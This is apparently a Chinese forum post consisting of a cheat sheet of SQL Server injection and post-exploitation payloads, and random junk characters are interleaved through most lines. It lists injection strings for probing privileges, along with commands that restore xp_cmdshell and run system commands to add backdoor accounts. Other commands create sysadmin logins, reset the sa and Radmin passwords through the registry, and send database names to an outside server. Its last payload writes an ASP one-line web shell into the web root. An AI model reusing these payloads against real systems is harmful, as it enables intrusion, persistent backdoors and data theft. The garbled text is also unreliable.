//看看是什么权限的0 @. `; h; v3 j0 i
and 1=(Select IS_MEMBER('db_owner'))
! w$ a! e( Y7 C, h( q2 t2 eAnd char(124)%2BCast(IS_MEMBER('db_owner') as varchar(1))%2Bchar(124)=1 ;--. ~& B7 l+ v6 H! U
! |$ t( Q0 b3 \0 E# V
//检测是否有读取某数据库的权限; p( L4 M$ c$ G5 {* H' }" R
and 1= (Select HAS_DBACCESS('master'))% I: `/ ], q. h
And char(124)%2BCast(HAS_DBACCESS('master') as varchar(1))%2Bchar(124)=1 --3 g' R8 e) }4 p! Z% I& }; T+ [. {
1 w# C$ ~, k6 Z/ B' h
k: ?! p# B& q3 c$ m0 K4 a
数字类型
0 q$ N; w$ |: ^0 b) M3 fand char(124)%2Buser%2Bchar(124)=0' |5 o1 o/ N O$ h H: m$ p w
4 J n1 x, N7 o# ^
字符类型
- f: |( [7 B0 c0 M! ?' and char(124)%2Buser%2Bchar(124)=0 and ''='0 v' D2 z7 A6 U2 z* G2 O- \; M
! B" f+ H% _2 @% Y( H: G* j' b
搜索类型 H0 T7 q; A- C' y6 \& H
' and char(124)%2Buser%2Bchar(124)=0 and '%'='0 u# X( I7 O) s$ H: d( }1 ^
9 _3 y3 X, n. o* _% I" g2 t J爆用户名
3 |; ]2 z1 q' B( k) tand user>0' ?) m% U# U7 v3 }# d
' and user>0 and ''='
1 ]. W7 G- B) S7 I \
5 n! y5 ~; S; i% I2 f; P* |! w# A: T1 t检测是否为SA权限4 W- }9 P' o# U7 [- W
and 1=(select IS_SRVROLEMEMBER('sysadmin'));--
' `: u& H# ?; z, y4 w' f rAnd char(124)%2BCast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00) as varchar(1))%2Bchar(124)=1 --
0 e. i% F: ]4 X; f$ ?2 M' y P! @0 S3 c: U1 b
检测是不是MSSQL数据库
7 j. [. U4 l9 j! Zand exists (select * from sysobjects);--
' y$ @) m$ a; M8 R" { K t. l
& `$ ?6 v: m" t! _7 _+ e检测是否支持多行$ H" C: @: K; n, s
;declare @d int;--
& G) J: Q: Z: L- _. ?" s) R8 c7 U& H9 o) f/ a9 f) u
恢复 xp_cmdshell
7 f3 p& r! f! ^9 v+ G;exec master..dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll';--, N4 U. R: E( M5 Z' L
+ X9 f3 n8 P$ T3 C, @! l S
6 f# V, K |7 u1 @7 B: A" Sselect * from openrowset('sqloledb','server=192.168.1.200,1433;uid=test;pwd=pafpaf','select @@version')
9 S! h) K% E j6 r q9 ]1 Q% n- ^ a" z5 V
//-----------------------4 O- |; N. d$ V$ v+ H; M6 L% K& |
// 执行命令7 t2 n9 [4 v0 A, e5 B
//-----------------------% a% g, H5 X5 V4 _( [$ n
首先开启沙盘模式:$ c6 j- I8 f" R, k, H
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1$ r: _- z- K7 b5 B3 ~% U
0 s9 ]) o/ X) {; b; d然后利用jet.oledb执行系统命令1 J7 G1 N6 r5 |1 c0 T8 H
select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\winnt\system32\ias\ias.mdb','select shell("cmd.exe /c net user admin admin1234 /add")')
* H2 E$ r5 w/ L! u4 ^$ d3 e/ [. f' F& q0 q5 N- k0 B+ A* i" l
执行命令# n3 P0 q+ t* F4 n7 j! }
;DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'C:\WINNT\system32\cmd.exe /c net user paf pafpaf /add';--
5 Q3 }$ w O8 ^7 L! t. x# \ B
6 {+ K" e9 H' V8 W( X/ BEXEC [master].[dbo].[xp_cmdshell] 'cmd /c md c:\1111'
, L% T i- X" y. ?4 i- y+ \) u, L. J" v' S2 T4 D" T5 X" ^2 s
判断xp_cmdshell扩展存储过程是否存在:' N: Z6 x3 t+ ~0 ^. J" o5 \6 S% ?
http://192.168.1.5/display.asp?keyno=188 and 1=(Select count(*) FROM master.dbo.sysobjects Where xtype = 'X' AND name = 'xp_cmdshell')2 o4 v. ?2 O) p p; I+ e
% j: m) w8 t8 F* u/ H. Z写注册表3 ?! _1 s2 g5 ^$ m9 d _ }+ ]
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',13 C! ?1 {5 i) [2 Y
# H2 V" D5 k- k6 p; TREG_SZ
; U; B7 B/ r# G8 g2 e" N6 Y" [: }$ v9 v' c4 \; x, P5 F$ W2 {
读注册表
- K \# t( m9 S1 Y6 S* i2 K! V& g* G9 ?exec master..xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon','Userinit'
) x9 E& D2 B+ c1 o s: q# p/ _* _$ `2 x1 g2 @1 }+ B
读取目录内容! H7 R9 V. m- ^* H
exec master..xp_dirtree 'c:\winnt\system32\',1,1
9 _; I) R a, K) R! _& q! b; G
- M% s/ g$ X m* ]* j7 G
& d% x) ?* i f- p9 f' M, X数据库备份3 ]2 D- N/ r3 }. Y" `5 {
backup database pubs to disk = 'c:\123.bak'6 O9 g1 A0 R: i% D
$ R6 }* S; A a: i' P//爆出长度7 \5 f4 Y" o; b9 l) }9 O/ f
And (Select char(124)%2BCast(Count(1) as varchar(8000))%2Bchar(124) From D99_Tmp)=0 ;--! S2 C+ {: G5 u1 X. R+ d. Z
3 A" V, d/ M4 `0 x* Z7 Q" D r0 @( l1 s* T. F
. M$ J3 ^. ?. N. r更改sa口令方法:用sql综合利用工具连接后,执行命令:, e/ H& Q- _( ^, q
exec sp_password NULL,'新密码','sa'
! ]9 A# y3 o5 X+ |2 X/ h6 {9 D5 {7 \6 S. |
添加和删除一个SA权限的用户test:
# ^) q$ P' `, u, I: Z& {) C% Zexec master.dbo.sp_addlogin test,9530772
( ~4 X4 ^6 D! a4 A8 Z rexec master.dbo.sp_addsrvrolemember test,sysadmin
0 R+ q" j' l/ p0 Q" x9 B- ^+ K8 R; O9 y H' y3 G8 }5 c8 b
删除扩展存储过过程xp_cmdshell的语句:
3 }; Z- }' t* {9 cexec sp_dropextendedproc 'xp_cmdshell'' {0 W( s; V) M/ H
7 _% R- j' K1 W: B
添加扩展存储过过程9 [3 G; W- _, y/ S* T
EXEC [master]..sp_addextendedproc 'xp_proxiedadata', 'c:\winnt\system32\sqllog.dll' ?* j4 p9 b; ? ~( t* ~
GRANT exec On xp_proxiedadata TO public& H( ?' c3 l; i! ~3 x
0 ~1 w& p, t F7 {! a1 ~( j
u+ p) ?# X/ M8 q9 F
停掉或激活某个服务。
, b1 H4 u0 j: k+ W' ^# e
# F6 V0 H: R: g8 e) Y6 ]exec master..xp_servicecontrol 'stop','schedule'$ H4 K) K" a- [7 y3 y: n) _+ H
exec master..xp_servicecontrol 'start','schedule'5 }, f0 f! g( n% E# c9 w W
) q/ l/ ], d% Q4 G! T
dbo.xp_subdirs
9 X0 ]* H3 d# y+ Y5 T% M) d& V$ t6 g7 w/ U6 A" U! b0 V8 n
只列某个目录下的子目录。0 w/ S3 [4 a( J! G1 s
xp_getfiledetails 'C:\Inetpub\wwwroot\SQLInject\login.asp'
. f: A7 w3 L$ t/ X2 g( m# c/ m# O: i& z* E
dbo.xp_makecab( [- v" @8 |9 G+ W* }$ B7 T: t1 C7 k5 V
1 D: l1 q- J! D! j3 C
将目标多个档案压缩到某个目标档案之内。
/ t% K9 O& y9 C% a9 R: F: b; h2 P所有要压缩的档案都可以接在参数列的最后方,以逗号隔开。
5 R& J- Q) z( l& ^! f2 J( q' G2 r$ Y7 j
dbo.xp_makecab1 ]( @4 d* ^+ {& X$ t
'c:\test.cab','mszip',1,+ }* {% }0 b; p
'C:\Inetpub\wwwroot\SQLInject\login.asp',* h `5 o7 d6 d# w/ A& i2 M! O
'C:\Inetpub\wwwroot\SQLInject\securelogin.asp'5 h7 t; W" r, Y0 I
! N$ M) ^& z4 u( J/ L* r# uxp_terminate_process9 j) F' h! r/ F6 ~: Y
. X6 e& r) x" T! I& \0 T
停掉某个执行中的程序,但赋予的参数是 Process ID。+ G$ |9 r4 ~9 t* e# K. d3 a" x% |6 Q9 u% e
利用”工作管理员”,透过选单「检视」-「选择字段」勾选 pid,就可以看到每个执行程序的 Process ID4 C! q- n" R% a( l
( S; q1 H* S# |7 q- G/ o! Z
xp_terminate_process 2484
( w5 z- `9 C0 `; I0 f7 F$ e" Y9 B) }. n
xp_unpackcab4 p% |' v1 S" A
q9 D1 g j# l. ]+ f
解开压缩档。
) x. _0 h) i/ Q+ A( U
- |: E( Y$ W' Q) o5 s. W% bxp_unpackcab 'c:\test.cab','c:\temp',1
2 ]2 |0 Q2 J/ z6 e& c6 ~8 p4 k5 W0 l! r1 w2 ^0 }
/ l( [' G0 R7 v" s1 K; \
某机,安装了radmin,密码被修改了,regedit.exe不知道被删除了还是被改名了,net.exe不存在,没有办法使用regedit /e 导入注册文件,但是mssql是sa权限,使用如下命令 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','Parameter','REG_BINARY',0x02ba5e187e2589be6f80da0046aa7e3c 即可修改密码为12345678。如果要修改端口值 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','port','REG_BINARY',0xd20400 则端口值改为12344 A& L) {( q" O
8 ?+ K! d& N8 O% a9 p& p4 N2 ?5 qcreate database lcx;7 T+ k$ t0 @9 ]" F o$ q2 `$ U
Create TABLE ku(name nvarchar(256) null);0 x: v. K Z; {% h7 a. T% t; B: m
Create TABLE biao(id int NULL,name nvarchar(256) null);
) c" N) e5 l" e6 X$ Q' n. Z8 c" {" E7 x
//得到数据库名
/ a2 D* s0 t2 @8 E/ l8 p& Ginsert into opendatasource('sqloledb','server=211.39.145.163,1443;uid=test;pwd=pafpaf;database=lcx').lcx.dbo.ku select name from master.dbo.sysdatabases n6 K2 |% C7 J( q+ Y
/ q2 e" J# x4 `
: i) Z L- l# \0 l2 W& `//在Master中创建表,看看权限怎样
# I4 {1 R/ Z& ?: D/ ECreate TABLE master..D_TEST(id nvarchar(4000) NULL,Data nvarchar(4000) NULL);--# C4 s) a: r, I* f" ]
# _9 F. A) o; p9 F3 H. O用 sp_makewebtask直接在web目录里写入一句话马:
# M; t5 r2 y' K' m4 t/ jhttp://127.0.0.1/dblogin123.asp?username=123';exec%20sp_makewebtask%20'd:\www\tt\88.asp','%20select%20''<%25execute(request("a"))%25>''%20';--' c3 V2 z2 \- p
4 k& _0 d. }; @//更新表内容: ]8 Q# `* _' |) i, C
Update films SET kind = 'Dramatic' Where id = 123* N6 z `. k7 k8 w
& y H, N9 f% t6 t
//删除内容, V3 z, V' ]: D# W
delete from table_name where Stockid = 3 |
发表于 2012-9-15 14:40:13
收藏
支持
反对